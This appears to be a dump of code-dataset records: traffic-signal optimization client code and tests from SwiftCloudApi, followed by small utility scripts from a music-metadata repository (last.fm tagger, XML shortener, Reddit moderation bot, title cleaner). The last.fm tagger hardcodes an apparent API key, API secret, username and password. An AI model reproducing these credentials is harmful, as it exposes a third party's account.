The violation: {e}\")\n raise SafetyViolation(e)\n\n endpoint = f\"{CLOUD_API_URL}/fts-optimization\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n min_period_duration=min_period_duration,\n max_period_duration=max_period_duration,\n objective=objective.value,\n )\n if fixed_time_schedules_to_exclude is not None:\n json_dict[\"fts_to_exclude\"] = [fts.to_json() for fts in fixed_time_schedules_to_exclude]\n if warm_start_info is not None:\n json_dict[\"warm_start_info\"] = warm_start_info\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n # parse output\n output = r.json()\n objective_value = output[\"obj_value\"]\n fixed_time_schedule = FixedTimeSchedule.from_json(output[\"fixed_time_schedule\"])\n # check if safety restrictions are satisfied; raises a SafetyViolation-exception if this is not the case.\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n phase_diagram = PhaseDiagram.from_json(output[\"phase_diagram\"])\n\n warm_start_info = output.get(\"warm_start_info\", dict())\n\n return fixed_time_schedule, phase_diagram, objective_value, warm_start_info\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_tuned_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n fixed_time_schedule: FixedTimeSchedule, horizon: float = 2.0,\n min_period_duration: float = 0.0, max_period_duration: float = 180,\n objective: ObjectiveEnum = ObjectiveEnum.min_delay,\n initial_queue_lengths: Optional[QueueLengths] = None) \\\n -> Tuple[FixedTimeSchedule, float]:\n \"\"\"\n Tune a fixed-time schedule; tune the greenyellow times to a new situation but keep the 'structure' of this\n fixed-time schedule the same (the phase diagram remains the same).\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param fixed_time_schedule: fixed-time schedule to tune.\n :param horizon: time period of interest in hours.\n :param min_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param max_period_duration: minimum period duration of the fixed-time schedule in seconds\n :param objective: what kpi (key performance indicator) to optimize. The following options are available:\n - ObjectiveEnum.min_delay: minimize the delay experienced by road users arriving at the intersection during\n the next 'horizon' hours. 
The initially waiting traffic is modeled as implicitly by increasing the\n arrival rate by initial_queue_length / horizon PCE/h; this implies that we assume that this traffic is arriving\n (evenly spread) during the horizon.\n - ObjectiveEnum.min_period: search for the fixed-time schedule with the smallest period duration for which\n all traffic lights are 'stable', i.e., the greenyellow interval is large enough so that the amount of traffic\n that can (on average) depart during the horizon exceeds the traffic that arrives during\n the horizon (+ initially waiting traffic).\n - ObjectiveEnum.max_capacity: search for the fixed-time schedule that can handle the largest (percentual)\n increase in traffic (including the initial amount of traffic), i.e., the largest percentual increase in traffic\n for which all traffic lights are 'stable' (see also ObjectiveEnum.min_period).\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic. The unit of each queue-length should align with the unit used for the arrival rate;\n if the arrival rate is specified in PCE/h then the queue-length needs to be specified in PCE.\n :return: fixed-time schedule, associated phase diagram and the objective value\n (minimized delay, minimized period, or maximum percentual increase in traffic divided by 100, e.g. 1 means\n currently at the verge of stability)\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n endpoint = f\"{CLOUD_API_URL}/fts-tuning\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n fixed_time_schedule=fixed_time_schedule.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n min_period_duration=min_period_duration,\n max_period_duration=max_period_duration,\n objective=objective.value\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n # parse output\n output = r.json()\n objective_value = output[\"obj_value\"]\n fixed_time_schedule = FixedTimeSchedule.from_json(output[\"fixed_time_schedule\"])\n # check if safety restrictions are satisfied; raises a SafetyViolation-exception if this is not the case.\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n\n return fixed_time_schedule, objective_value\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def evaluate_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n fixed_time_schedule: FixedTimeSchedule, horizon: float = 2.0,\n initial_queue_lengths: Optional[QueueLengths] = None) -> KPIs:\n \"\"\"\n Evaluate a fixed-time schedule; returns KPIs (estimated delay experienced by road users and the 
capacity (\n see also KPIs and the SwiftMobilityCloudApi.get_optimized_fts() method for their definition.\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param fixed_time_schedule:\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic.\n :param horizon: time period of interest in hours.\n :return KPIs, which are the estimated\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n endpoint = f\"{CLOUD_API_URL}/fts-evaluation\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n fixed_time_schedule=fixed_time_schedule.to_json()\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n return KPIs.from_json(r.json())\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_phase_diagram(cls, intersection: Intersection, fixed_time_schedule: FixedTimeSchedule) -> PhaseDiagram:\n \"\"\"\n Get the phase diagram specifying the order in which the signal groups have their greenyellow intervals\n in the fixed-time schedule\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param fixed_time_schedule: fixed-time schedule for which we want to retrieve the phase diagram.\n :return: the associated phase diagram\n\n IMPORTANT: we try to start the greenyellow intervals of two signal groups that are subject to a synchronous\n start or a greenyellow-lead in the same phase; however, if this is not possible for all such pairs, then we try to\n satisfy it for as many such pairs as possible.\n\n For example consider the following theoretical problem where we have three signal groups:\n sg1, sg2, and sg3. sg1 conflicts with sg2 and sg3. sg2 has a greenyellow_lead(min=30, max=50) w.r.t. 
sg3.\n The following schedule is feasible\n greenyellow_intervals = {\"sg1\": [[0, 10], [40, 50]], \"sg2\": [[20, 30]], \"sg3\": [[60,70]]}\n period=80\n\n However, it is not possible to find a phase diagram where sg2 and sg3 start in the same phase; only the\n following phase diagram is possible: [[[\"sg1\", 0]], [[\"sg2\", 0]], [[\"sg1\", 1]], [[\"sg3\", 0]]]\n \"\"\"\n endpoint = f\"{CLOUD_API_URL}/phase-diagram-computation\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n json_dict = dict(\n intersection=intersection.to_json(),\n greenyellow_intervals=fixed_time_schedule.to_json()[\"greenyellow_intervals\"],\n period=fixed_time_schedule.to_json()[\"period\"]\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n output = r.json()\n\n # parse output\n phase_diagram = PhaseDiagram.from_json(output[\"phase_diagram\"])\n return phase_diagram\n\n\ndef check_all_arrival_rates_and_queue_lengths_specified(intersection: Intersection, arrival_rates: ArrivalRates,\n initial_queue_lengths: QueueLengths):\n \"\"\"\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates in personal car equivalent per hour (PCE/h)\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic.\n :raises AssertionError if an arrival rate or queue length is not specified for some traffic light(s).\n \"\"\"\n for signalgroup in intersection.signalgroups:\n assert signalgroup.id in arrival_rates.id_to_arrival_rates, \\\n f\"arrival rate(s) must be specified for signal group {signalgroup.id}\"\n assert len(arrival_rates.id_to_arrival_rates[signalgroup.id]) == len(signalgroup.traffic_lights), \\\n f\"arrival rate(s) must be specified for all traffic lights of signal group {signalgroup.id}\"\n\n assert signalgroup.id in initial_queue_lengths.id_to_queue_lengths, \\\n f\"initial_queue_lengths(s) must be specified for signal group {signalgroup.id}\"\n assert len(initial_queue_lengths.id_to_queue_lengths[signalgroup.id]) == len(signalgroup.traffic_lights), \\\n f\"initial_queue_lengths(s) must be specified for all traffic lights of signalgroup {signalgroup.id}\"\n"
},
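All three cloud endpoints above apply the same pre-processing before the REST call: initial queues are assumed to arrive evenly over the horizon and are added to the arrival rates. A sketch of just that correction step, assuming ArrivalRates supports addition as its use in the source implies (the values are made up):

from swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates
from swift_cloud_py.entities.scenario.queue_lengths import QueueLengths

horizon = 2.0  # hours
arrival_rates = ArrivalRates(id_to_arrival_rates={"2": [800.0]})
initial_queue_lengths = QueueLengths(id_to_queue_lengths={"2": [30.0]})

# same correction as in get_optimized_fts, get_tuned_fts and evaluate_fts
corrected = arrival_rates + initial_queue_lengths / horizon
print(corrected.id_to_arrival_rates)  # {'2': [815.0]}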
{
"alpha_fraction": 0.6070489287376404,
"alphanum_fraction": 0.6267753839492798,
"avg_line_length": 33.880733489990234,
"blob_id": "f57bd7137ba72c4e93eef19bdd3f6612b3d81f04",
"content_id": "3dabf611f13a996ebd763e53f7007b52c11c5047",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3802,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 109,
"path": "/swift_cloud_py/entities/scenario/test/test_queue_lengths.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for QueueLengths() \"\"\"\n return dict(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing QueueLengths object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n QueueLengths(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_rates(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][\"3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_queue_lengths_no_number(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][\"3\"] = [1, \"3\"] # rates is not a list of numbers\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestOperations(unittest.TestCase):\n\n def test_divide(self) -> None:\n \"\"\" Test dividing QueueLengths by a float (a time)\"\"\"\n # GIVEN\n queue_lengths = QueueLengths(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n # WHEN\n rates = queue_lengths / 2\n\n # THEN\n self.assertIsInstance(rates, ArrivalRates)\n self.assertListEqual(rates.id_to_arrival_rates[\"1\"], [1000 / 2, 950 / 2])\n self.assertListEqual(rates.id_to_arrival_rates[\"2\"], [850 / 2, 700 / 2])\n\n def test_dividing_no_float(self) -> None:\n \"\"\" Test dividing by incorrect datatype \"\"\"\n # GIVEN\n queue_lengths = QueueLengths(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n queue_lengths / \"str\"\n\n # THEN an assertion should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n queue_lengths = QueueLengths(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n queue_lengths_dict = queue_lengths.to_json()\n queue_lengths_from_json = QueueLengths.from_json(queue_lengths_dict=queue_lengths_dict)\n self.assertDictEqual(queue_lengths_dict, queue_lengths_from_json.to_json())\n"
},
{
"alpha_fraction": 0.5995623469352722,
"alphanum_fraction": 0.5995623469352722,
"avg_line_length": 25.114286422729492,
"blob_id": "25581edc31be85776cd603401156387620ef945c",
"content_id": "9e22860bf61643c8ec45ec41501f4b8ae9ebf9a8",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 35,
"path": "/swift_cloud_py/entities/intersection/periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\n\nfrom copy import deepcopy\nfrom typing import List, Dict\n\n\nclass PeriodicOrder:\n def __init__(self, order: List[str]):\n \"\"\" Order in which to serve signal groups\"\"\"\n self._order = order\n\n # validate values of arguments\n self._validate()\n\n def __repr__(self) -> str:\n return f\"FixedOrder({self._order})\"\n\n @property\n def order(self) -> List[str]:\n return self._order\n\n def __iter__(self):\n return iter(self._order)\n\n @classmethod\n def from_json(cls, order_dict: Dict) -> PeriodicOrder:\n return cls(order=order_dict[\"order\"])\n\n def to_json(self) -> Dict:\n return {\"order\": deepcopy(self._order)}\n\n def _validate(self):\n \"\"\" Validate input arguments of Confict \"\"\"\n if len(set(self._order)) != len(self._order):\n raise ValueError(\"Items in 'order' should be unique\")\n"
}
] | 44 |
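PeriodicOrder above follows the same to_json/from_json round-trip convention as the other entities in this package; a quick sketch, assuming the import path as listed in the record:

from swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder

order = PeriodicOrder(order=["2", "8", "5"])
as_dict = order.to_json()                    # {'order': ['2', '8', '5']}
restored = PeriodicOrder.from_json(as_dict)  # same order restored
print(restored.order == order.order)         # True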
visti/Sandrew | https://github.com/visti/Sandrew | 6459fc2935529223e4b5db897e62e9b00889f3b4 | c2d25fdd414ad2aa416e70fa48ef60ef94b50922 | aeb286def7614781ab1ee6b5175a5dc38216dec0 | refs/heads/master | 2020-12-25T15:29:05.847952 | 2018-08-23T09:47:58 | 2018-08-23T09:47:58 | 38,604,891 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.637982189655304,
"alphanum_fraction": 0.6577646136283875,
"avg_line_length": 19.0625,
"blob_id": "096550d65538c010d9dc6a7cb1557e64be3bcab1",
"content_id": "dcef089c106abe284fe97ec4dc9daaeb680696ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2022,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 96,
"path": "/pylast_tagger/pylast_tagger.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import pylast\r\nimport tkinter\r\nimport re\r\nimport tkinter.filedialog\r\nimport tkinter.simpledialog\r\nimport random\r\nfrom retrying import retry\r\n\r\nglobal artist\r\nglobal title\r\nglobal itunes_main\r\nglobal itunes_sub\r\n\r\n# GUI Drawing + Focus settings\r\n\r\nroot = tkinter.Tk()\r\nroot.withdraw()\r\nroot.lift()\r\nroot.focus_force()\r\n\r\n# Categorize genres\r\nwith open('main_genres.txt', 'r') as f:\r\n\tmain_genres = [lines.strip() for lines in f]\r\n\r\nwith open('sub_genres.txt', 'r') as f:\r\n\tsub_genres = [lines.strip() for lines in f]\r\n\r\n\r\n\r\n# read track list \r\nfile_path = tkinter.filedialog.askopenfilename()\r\n\r\nlines = open(file_path, 'r').readlines()\r\n\r\ndef split_track(song):\r\n\t\tstripped = [song.strip() for line in song]\r\n\t\tparts = stripped[0].split('|')\r\n\t\tglobal artist\r\n\t\tartist = parts[0]\r\n\t\tglobal title\r\n\t\ttitle = parts[1]\r\n\r\n\t\r\n\r\ndef search_lastfm(artist, title):\r\n\ttry :\r\n\t\ttrack = network.get_track(artist, title)\r\n\t\ttags = track.get_top_tags()\r\n\r\n\t\tgenre = []\r\n\r\n\t\tfor topItem in tags:\r\n\t\t\tgenre.append(topItem.item.get_name())\r\n\r\n\t\tglobal itunes_main\r\n\t\tglobal itunes_sub\r\n\t\titunes_main = set([x.title() for x in genre]).intersection(main_genres)\r\n\t\titunes_sub_raw = set([x.title() for x in genre]).intersection(sub_genres)\r\n\t\titunes_sub = []\r\n\t\tfor x in itunes_sub_raw:\r\n\t\t\tif x not in itunes_main:\r\n\t\t\t\titunes_sub.append(x)\r\n\t\tfinal = str(track) +\"|\"+\" \".join(itunes_main) +\"|\"+\" \".join(itunes_sub) + \"\\n\"\r\n\t\tprint(final)\r\n\t\twritefile(final)\r\n\t\r\n\texcept pylast.WSError:\r\n\t\tprint(artist + \" - \" + title + \"\\n\")\r\n\r\n\r\n\r\n\r\ndef writefile(final):\r\n\twith open(\"output.txt\", 'a') as f:\r\n\t\tf.write(final)\r\n\r\n# API Authentication\r\n\r\nAPI_KEY = \"8611a1f82dd20dc8ca8af7e5bc303ca9\"\r\nAPI_SECRET = \"a2aa6b3434e4c96a05e1433bad60486f\"\r\nusername = \"visti\"\r\npassword_hash = pylast.md5(\"hunter2\")\r\nnetwork = pylast.LastFMNetwork(api_key = API_KEY, api_secret =\r\n API_SECRET, username = username, password_hash = password_hash)\r\n\r\n\r\n\r\n# Main Loop\r\n\r\n\r\nfor song in lines:\r\n\tsplit_track(song)\r\n\tsearch_lastfm(artist, title)\r\n\r\n\r\n#\r\n"
},
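The genre mapping in the tagger above works by set intersection: last.fm tags are title-cased and intersected with a whitelist of main genres, and matches against the sub-genre list are kept only if they are not already main genres. That core step in isolation (the tag and whitelist values here are hypothetical, not from the source):

tags = ["electronic", "Ambient", "idm", "chillout"]
main_genres = {"Electronic", "Rock", "Jazz"}
sub_genres = {"Ambient", "Idm", "Trip-Hop"}

titled = {tag.title() for tag in tags}
itunes_main = titled & main_genres                 # {'Electronic'}
itunes_sub = (titled & sub_genres) - itunes_main   # {'Ambient', 'Idm'}
print(itunes_main, itunes_sub)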
{
"alpha_fraction": 0.6726535558700562,
"alphanum_fraction": 0.6906141638755798,
"avg_line_length": 24,
"blob_id": "1474797c63224b321a7fc23f1439edd7893137e7",
"content_id": "5cebe7928ace6af4f0ee85fa851a6e738c60b904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1726,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 69,
"path": "/xml_shortener.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "#-*- coding: UTF-8 -*-\n# A script to find XML fields exceeding an 80 character limit and shorten them.\n# Uses a tkinter file selection dialog\n\n\nimport xml.etree.cElementTree as ET\nimport itertools\nimport tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nfrom tkinter.simpledialog import Dialog\nfrom tkinter.simpledialog import Toplevel\nfrom tkinter.simpledialog import Label\nimport winsound\nimport os\n\nusername = os.getlogin()\n\n# GUI Drawing + Focus settings\ntkroot = tkinter.Tk()\ntkroot.withdraw()\ntkroot.lift()\ntkroot.focus_force()\n\n\n# choose original file\noriginal_file = tkinter.filedialog.askopenfilename(\n title=\"Choose File:\", initialdir=os.curdir)\n\noutput_file = original_file[:-4] + '_fixed.xml'\n\n# create tree from XML file\ntree = ET.parse(original_file)\nroot = tree.getroot()\n\n# iterate through the 3 elements:\nfield_list = [\"MAIN-ARTIST-NAME-COLLECTING-SOCIETY\",\n \"RECORDING-TITLE-COLLECTING-SOCIETY\",\n \"LABEL\"]\n\ndef working_message(username):\n os.system('cls')\n print(\"\\n\" * 10)\n print(\"-\" * 120)\n print(\"\\n\")\n print(\"XML Shortening Script\".center(120))\n print(\"Working..\".center(120))\n print(\"\\n\")\n print(\"running for user: \\n\".center(120))\n print(username.center(120))\n print(\"-\" * 120)\n print(\"\\n\")\n \nworking_message(username)\n\nfor i in field_list:\n for element in root.iter(i):\n if len(element.text) > 80:\n element.text = element.text[:80]\n\ntree = ET.ElementTree(root)\n\n\n# write corrected file to disk\ntree.write(open(output_file, 'wb'), encoding=\"utf-8\", xml_declaration=True)\n\n# Completion message\nwinsound.MessageBeep(1)\ntkinter.messagebox.showinfo(\"Done!\", \"Created file: \\n\" + output_file + \".\")\n\n"
},
{
"alpha_fraction": 0.6589556932449341,
"alphanum_fraction": 0.6678783893585205,
"avg_line_length": 33.77011489868164,
"blob_id": "f420ccf261b8d2153d51931c3aeec0ad3f98c404",
"content_id": "f6e33102e469a3ab50fc32b753a55f13e3210700",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3028,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 87,
"path": "/reddit_OP_comment_checker.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import praw\nimport datetime\nimport time\n\ndef main():\n\n\t# Authenticate Reddit bot. Needs API client_id and client_secret\n\treddit = praw.Reddit(client_id='',\n\t\t\t\t\t\tclient_secret='',\n\t\t\t\t\t\tpassword='',\n\t\t\t\t\t\tusername='guitar_remover_bot',\n\t\t\t\t\t\tuser_agent='my user agent')\n\n\t \n\t# Active Subreddit for the bot\n\ttarget_subreddit = reddit.subreddit('7330313')\n\n\t# username for the bot – Used to make sure there's no duplicate warning messages\n\tbot_username = 'guitar_remover_bot'\n\t\t\t\t\t\t\n\t# Getting current time and stripping it of seconds and microseconds\n\tcurrent_time=datetime.datetime.now()\n\tcurrent_time=current_time.replace(second=0,microsecond=0)\n\n\t# Main loop, runs every minute\n\twhile True:\n\t\tfor submission in target_subreddit.new(limit=100):\n\t\t\tsubmission_checker(submission, bot_username)\n\t\ttime.sleep(60)\n\n\n# The base function that checks every submission\ndef submission_checker(submission, bot_username):\n\t\t# Create list of all usernames to comment on a submission\n\t\tcomment_authors=[]\n\t\tprint(\"THREAD TITLE: \" + \"\\\"\" + submission.title + \"\\\"\")\n\t\t\n\t\t# Check thread age and convert to minutes\n\t\tthread_age = datetime.datetime.now(datetime.timezone.utc).timestamp()-submission.created_utc\n\t\tthread_age = thread_age/60\n\t\tprint(str(thread_age).split(\".\")[0] + \" mins old.\")\n\t\t\n\t\t# Add all current commenters to the list\n\t\tfor top_level_comment in submission.comments:\n\t\t\t\tcomment_authors.append(top_level_comment.author.name)\n\t\t\n\t\t# Print out submission OP and active commenters\n\t\tprint( \"OP = \" + str(submission.author))\n\t\tprint(\"Commenters: \" + str(comment_authors) + \"\\n\")\n\t\t\n\t\t# Print out message if OP has already replied\n\t\tif submission.author in comment_authors:\n\t\t\tprint(\"## OP Commented. ##\\n\\n\")\n\t\t\n\t\t# If the thread is older than 30 minutes:\n\t\tif thread_age > 30:\n\t\t\t# and OP has not replied:\n\t\t\tif submission.author not in comment_authors:\n\t\t\t\t# print messages to console and remove thread\n\t\t\t\tprint(\"## Thread overdue. ##\\n## OP has not commented. ## \\n\")\n\t\t\t\tsubmission.mod.remove()\n\t\t\t\tprint(\"## Thread removed. ##\")\n\t\t\t\tprint(\"----------------------------------------------------------\\n\")\n\t\t\n\t\t# if thread is older than 10 minutes:\n\t\tif thread_age > 10:\n\t\t\t# and OP HAS replied:\n\t\t\tif submission.author in comment_authors:\n\t\t\t\tfor top_level_comment in submission.comments:\n\t\t\t\t\t# remove flair and delete warning message\n\t\t\t\t\tif top_level_comment.author == bot_username:\n\t\t\t\t\t\tsubmission.mod.flair(\"\")\n\t\t\t\t\t\ttop_level_comment.delete()\n\t\t\t\t\t\tprint(\"## Removed warning message. ##\")\n\n\t\t\t# if OP has NOT replied:\t\t\t\n\t\t\tif submission.author not in comment_authors:\n\t\t\t\t# set flair\n\t\t\t\tsubmission.mod.flair('Missing OP comment')\n\t\t\t\t # post warning message\n\t\t\t\tif bot_username not in comment_authors:\n\t\t\t\t\tsubmission.reply(\"Friendly reminder that all submisssions must feature a comment from the author.\\nThis submission will be removed in 20 minutes if not descriptive comment is made.\")\n\t\t\t\tprint(\"----------------------------------------------------------\\n\")\n\n# main loop\nif __name__ == '__main__':\n\tmain()\n\n"
},
{
"alpha_fraction": 0.6162070631980896,
"alphanum_fraction": 0.6207090616226196,
"avg_line_length": 21.78205108642578,
"blob_id": "128369998cd2551e74207de388563d6d059c2d1b",
"content_id": "04e661cb4bb84ab17e871e930f9cf04392b99be7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 78,
"path": "/clean_titles_test.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nimport re\nimport time\nimport datetime\nimport os\n\n# Pattern to search for\n\nmessy_title_pat = re.compile(r', (The|A|An)$')\n\n# Backup old log-file\n\nif os.path.isfile('logfile2.txt'):\n os.remove('logfile2.txt')\nif os.path.isfile('logfile.txt'):\n os.rename('logfile.txt', 'logfile2.txt')\n\n# Options\n\nnoncorrectlog = 0\n\n# GUI Drawing + Focus settings\n\nroot = tkinter.Tk()\nroot.withdraw()\nroot.lift()\nroot.focus_force()\n\n# Choose Input/Output Files\n\nfile_path = tkinter.filedialog.askopenfilename()\nclean_path = tkinter.simpledialog.askstring('Gem renset fil',\n 'Indtast filnavn', initialvalue=file_path[:-4] + 'Clean.txt')\nlines = open(file_path, 'r').readlines()\n\n\ndef logfile(song_title):\n with open('logfile.txt', 'a') as f:\n ts = time.time()\n logtime = \\\n datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S')\n f.write(logtime + ' - ' + song_title)\n\n\ndef add_lines(song_title):\n with open(clean_path, 'a') as f:\n f.write(song_title)\n\n\ndef clean_title(song_title):\n match = messy_title_pat.search(song_title)\n if match:\n print('RETTET: ' + '\"' + song_title.strip() + '\"')\n logfile(song_title)\n return match.group(1) + ' ' + song_title[:match.start()] + '\\n'\n else:\n\n # If noncorrect-log is on, also output non-corrected filenames to log file\n\n if noncorrectlog == 1:\n print('IKKE RETTET: ' + '\"' + song_title.strip() + '\"')\n logfile('IKKE RETTET: ' + song_title)\n return song_title\n else:\n return song_title\n\n\n### MAIN LOOP ###\n\nfor song_title in lines:\n add_lines(clean_title(song_title))\n\n### MAIN LOOP ###\n"
},
{
"alpha_fraction": 0.5892373323440552,
"alphanum_fraction": 0.6182733178138733,
"avg_line_length": 26.478723526000977,
"blob_id": "d50c07496537f27e3d6fe898da37eb68dc1d4461",
"content_id": "b9fd861d2d492a81789cc547731cdef647345a3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2587,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 94,
"path": "/filelocator",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
